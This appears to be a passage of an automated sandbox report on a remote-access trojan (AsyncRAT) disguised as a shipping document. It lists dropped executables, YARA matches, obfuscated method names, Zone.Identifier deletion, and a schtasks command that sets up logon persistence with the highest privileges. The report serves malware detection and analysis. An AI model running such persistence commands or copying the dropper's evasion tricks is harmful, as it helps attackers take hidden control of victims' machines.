                    Source: 3.2.Icda.exe.a40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
                    Source: 3.0.Icda.exe.a40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
                    Source: 3.0.Icda.exe.a40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeFile created: C:\Users\user\AppData\Local\Temp\Icda.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeFile created: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeFile created: C:\Users\user\AppData\Local\Temp\VLC2.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeFile created: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeFile created: C:\Users\user\AppData\Local\Temp\Isgeprf.exeJump to dropped file

                    Boot Survival:

                    barindex
                    Yara detected AsyncRATShow sources
                    Source: Yara matchFile source: 00000004.00000000.242716308.0000000000712000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.483926024.0000000000902000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.263991887.0000000002BB2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000000.271847625.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.283204276.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.266244520.0000000000902000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.263102745.0000000000712000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Isgeprf.exe PID: 6976, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Rczgwoxvqzh.exe PID: 6872, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: VLC2.exe PID: 6228, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: VLC2.exe PID: 6008, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\VLC2.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe, type: DROPPED
                    Source: Yara matchFile source: 14.0.VLC2.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.0.VLC2.exe.a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.VLC2.exe.a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.VLC2.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.Isgeprf.exe.710000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Isgeprf.exe.710000.0.unpack, type: UNPACKEDPE
                    Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                    Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'VLC2' /tr ''C:\Users\user\AppData\Local\Temp\VLC2.exe''

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeFile opened: C:\Users\user\AppData\Local\Temp\Icda.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
